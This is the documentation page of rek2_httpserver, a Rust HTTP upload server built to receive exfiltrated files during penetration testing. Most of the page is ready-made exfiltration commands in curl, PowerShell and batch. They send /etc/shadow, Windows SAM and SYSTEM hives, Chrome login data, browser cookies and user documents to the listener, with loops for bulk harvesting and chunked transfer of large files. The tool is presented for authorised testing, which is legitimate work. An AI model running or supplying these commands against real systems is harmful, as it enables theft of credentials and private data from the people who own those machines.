rek2_httpserver 0.1.1

HTTP server that accepts POST data to exfiltrate files from remote servers to local computer during hacking and penetration testing
Documentation

rek2_httpserver

rek2_httpserver is a robust HTTP server written in Rust designed for reliable file exfiltration during penetration testing/Hacking. The server handles file uploads of any size and type while preserving filenames and data integrity.

Features

  • Configurable Interface and Port: Specify the network interface and port via command-line arguments
  • Organized File Storage: Files are automatically organized by timestamp and client IP
  • Multiple Filename Sources: Extracts filenames from URL path, X-Filename header, or Content-Disposition
  • Large File Support: Configurable size limits (default 500MB) with streaming support
  • Path Preservation: Maintains directory structure from uploaded files
  • Better Error Handling: Graceful handling of edge cases and malformed requests
  • Detailed Logging: Shows file sizes, client IPs, and full save paths
  • Usage Examples: GET request to / shows curl examples

Usage

Command-Line Arguments

  • -i, --interface <INTERFACE>: Sets the interface IP address. Default is 0.0.0.0 (all available interfaces)
  • -p, --port <PORT>: Sets the port number. Default is 8081
  • -o, --output <OUTPUT>: Sets the output directory for uploads. Default is ./uploads
  • -s, --max-size <MAX_SIZE>: Maximum file size in MB. Default is 500

Running the Server

To start the server on a specific interface and port:

./rek2_httpserver -i 127.0.0.1 -p 8081

This will start the server on http://127.0.0.1:8081.

Exfiltrating Files

The server now supports multiple methods for specifying filenames:

Method 1: Filename in URL Path (Recommended)

# Linux - preserves directory structure
curl -X POST --data-binary @/etc/passwd http://127.0.0.1:8081/upload/etc/passwd

# Windows
curl -X POST --data-binary "@C:\\Windows\\System32\\config\\SAM" http://127.0.0.1:8081/upload/Windows/System32/config/SAM

Method 2: X-Filename Header

# Linux
curl -X POST --data-binary @sensitive.db -H "X-Filename: database.db" http://127.0.0.1:8081/upload/

# Windows
curl -X POST --data-binary "@C:\\Users\\Admin\\secrets.txt" -H "X-Filename: admin_secrets.txt" http://127.0.0.1:8081/upload/

Method 3: Content-Disposition Header

# Linux
curl -X POST --data-binary @large_file.sql -H "Content-Disposition: attachment; filename=backup.sql" http://127.0.0.1:8081/upload/

# Windows
curl -X POST --data-binary "@C:\\Database\\prod.db" -H "Content-Disposition: attachment; filename=production.db" http://127.0.0.1:8081/upload/

Method 4: Auto-generated Filename

# When no filename is provided, generates timestamp-based name
curl -X POST --data-binary @confidential.zip http://127.0.0.1:8081/upload/

File Organization

  • Files are saved to: uploads/YYYY-MM-DD_HH-MM-SS/client_ip/filename
  • The uploads directory is automatically created if it doesn't exist
  • Directory structure from the client is preserved when possible
  • Each upload session gets its own timestamp directory
  • No file overwrites - each upload is uniquely stored

Server Output

The server provides detailed logging:

Server running on http://0.0.0.0:8081
Output directory: ./uploads
Max file size: 500MB
[2024-01-15_14:30:45] 192.168.1.100 - 'etc/passwd' saved (2837 bytes) -> uploads/2024-01-15_14-30-45/192.168.1.100/etc/passwd

Common Exfiltration Examples

Linux Examples

Single File Upload

# Basic file upload (filename will be auto-generated)
curl -X POST --data-binary @/etc/passwd http://target:8081/upload/

# Upload with filename in URL (recommended - preserves path)
curl -X POST --data-binary @/etc/passwd http://target:8081/upload/etc/passwd

# Upload with custom filename
curl -X POST --data-binary @/etc/shadow -H "X-Filename: shadow_backup" http://target:8081/upload/

# Upload sensitive database
curl -X POST --data-binary @/var/lib/mysql/users.db http://target:8081/upload/mysql/users.db

Multiple Files

# Upload all config files from a directory
for file in /etc/*.conf; do
    curl -X POST --data-binary @"$file" http://target:8081/upload/etc/$(basename "$file")
done

# Create a tar archive and upload
tar czf - /etc/apache2/ | curl -X POST --data-binary @- -H "X-Filename: apache_config.tar.gz" http://target:8081/upload/

# Upload all log files
find /var/log -name "*.log" -type f -exec curl -X POST --data-binary @{} http://target:8081/upload/{} \;

Windows Examples

PowerShell

# Basic file upload
Invoke-WebRequest -Uri "http://target:8081/upload/" -Method POST -InFile "C:\Windows\System32\config\SAM"

# Upload with filename in URL
$file = "C:\Users\Admin\Documents\passwords.xlsx"
$filename = Split-Path $file -Leaf
Invoke-WebRequest -Uri "http://target:8081/upload/$filename" -Method POST -InFile $file

# Upload with custom headers
$headers = @{ "X-Filename" = "windows_sam_backup" }
Invoke-WebRequest -Uri "http://target:8081/upload/" -Method POST -InFile "C:\Windows\System32\config\SAM" -Headers $headers

# Upload multiple files
Get-ChildItem -Path "C:\Users\*\Desktop\*.txt" -Recurse | ForEach-Object {
    $relativePath = $_.FullName.Replace("C:\", "").Replace("\", "/")
    Invoke-WebRequest -Uri "http://target:8081/upload/$relativePath" -Method POST -InFile $_.FullName
}

Command Prompt (curl)

:: Basic upload
curl -X POST --data-binary "@C:\Windows\System32\drivers\etc\hosts" http://target:8081/upload/

:: Upload with filename in URL
curl -X POST --data-binary "@C:\Users\Admin\AppData\Local\Chrome\User Data\Default\Login Data" http://target:8081/upload/chrome/login_data.db

:: Upload registry hive
curl -X POST --data-binary "@C:\Windows\System32\config\SYSTEM" -H "X-Filename: SYSTEM_HIVE" http://target:8081/upload/

:: Upload with Content-Disposition
curl -X POST --data-binary "@C:\ProgramData\TeamViewer\TeamViewer.ini" -H "Content-Disposition: attachment; filename=teamviewer_config.ini" http://target:8081/upload/

Batch Script for Multiple Files

@echo off
setlocal enabledelayedexpansion

set SERVER=http://target:8081/upload/

:: Upload all PDF files from Documents
for /r "C:\Users\%USERNAME%\Documents" %%f in (*.pdf) do (
    echo Uploading: %%f
    curl -X POST --data-binary "@%%f" %SERVER%documents/%%~nxf
)

:: Upload browser data
set BROWSERS=Chrome Firefox Edge
for %%b in (%BROWSERS%) do (
    if exist "C:\Users\%USERNAME%\AppData\Local\%%b" (
        echo Uploading %%b data...
        curl -X POST --data-binary "@C:\Users\%USERNAME%\AppData\Local\%%b\User Data\Default\History" %SERVER%browser/%%b_history
        curl -X POST --data-binary "@C:\Users\%USERNAME%\AppData\Local\%%b\User Data\Default\Cookies" %SERVER%browser/%%b_cookies
    )
)

Special Cases

Large Files

# Linux - Split large files before upload
split -b 100M large_backup.sql part_
for file in part_*; do
    curl -X POST --data-binary @"$file" http://target:8081/upload/backup/$file
done

# Windows PowerShell - Upload in chunks
$file = "C:\LargeDatabase.bak"
$chunkSize = 100MB
$stream = [System.IO.File]::OpenRead($file)
$buffer = New-Object byte[] $chunkSize
$chunkNum = 0

while (($bytesRead = $stream.Read($buffer, 0, $chunkSize)) -gt 0) {
    $tempFile = [System.IO.Path]::GetTempFileName()
    [System.IO.File]::WriteAllBytes($tempFile, $buffer[0..($bytesRead-1)])
    Invoke-WebRequest -Uri "http://target:8081/upload/database_chunk_$chunkNum" -Method POST -InFile $tempFile
    Remove-Item $tempFile
    $chunkNum++
}
$stream.Close()

Compressed Upload

# Linux - Compress before sending
gzip -c /var/log/syslog | curl -X POST --data-binary @- -H "X-Filename: syslog.gz" http://target:8081/upload/

# Windows - ZIP and upload
Compress-Archive -Path "C:\SensitiveData\*" -DestinationPath "$env:TEMP\data.zip"
Invoke-WebRequest -Uri "http://target:8081/upload/sensitive_data.zip" -Method POST -InFile "$env:TEMP\data.zip"
Remove-Item "$env:TEMP\data.zip"

Building the Project

To build the project, use:

cargo build --release

This will create an executable in the `target/release` directory.

Testing

The project includes comprehensive unit and integration tests:

# Run all tests
cargo test

# Run only unit tests
cargo test --lib

# Run only integration tests
cargo test --test upload_tests

Test Coverage:

  • 17 unit tests covering filename extraction, header parsing, and edge cases
  • 10 integration tests covering end-to-end upload functionality
  • Tests for binary file integrity, unicode filenames, and error handling

For detailed testing information, see TEST.md.

License

This project is licensed under the GPLv3 License - see the LICENSE file for details.